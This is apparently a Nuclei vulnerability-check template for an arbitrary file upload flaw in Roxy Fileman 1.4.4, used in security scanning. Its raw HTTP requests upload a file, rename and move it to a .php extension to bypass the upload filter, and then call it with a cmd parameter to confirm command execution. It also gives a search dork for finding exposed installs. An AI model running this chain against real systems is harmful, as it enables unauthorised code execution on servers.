id: roxyfileman-fileupload info: name: Roxy Fileman 1.4.4 - Arbitrary File Upload author: DhiyaneshDK severity: high description: | Roxy Fileman 1.4.4 is susceptible to remote code execution via the FORBIDDEN_UPLOADS setting, which is checked when renaming an existing file to a new file extension. An attacker can bypass this check and rename already uploaded files to any extension using the move function, which does not perform any checks. reference: - https://www.exploit-db.com/exploits/39963 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cwe-id: CWE-434 metadata: max-request: 4 verified: true google-query: intitle:"Roxy file manager" tags: intrusive,misconfig,edb,roxy,fileman,rce,fileupload http: - raw: - | POST /php/upload.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6rbEqFAMRkE0RAB7 ------WebKitFormBoundary6rbEqFAMRkE0RAB7 Content-Disposition: form-data; name="action" upload ------WebKitFormBoundary6rbEqFAMRkE0RAB7 Content-Disposition: form-data; name="method" ajax ------WebKitFormBoundary6rbEqFAMRkE0RAB7 Content-Disposition: form-data; name="d" /app/Uploads ------WebKitFormBoundary6rbEqFAMRkE0RAB7 Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.jpg" Content-Type: image/jpeg ------WebKitFormBoundary6rbEqFAMRkE0RAB7-- - | POST /php/renamefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php - | POST /php/movefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php - | GET /Uploads/{{randstr}}.php?cmd=echo+"roxyfileman"+|+rev HTTP/1.1 Host: {{Hostname}} cookie-reuse: true host-redirects: true max-redirects: 2 matchers-condition: and matchers: - type: regex part: body regex: - "namelifyxor" - type: word part: header words: - text/html - type: status status: - 200 # Enhanced by md on 2022/10/04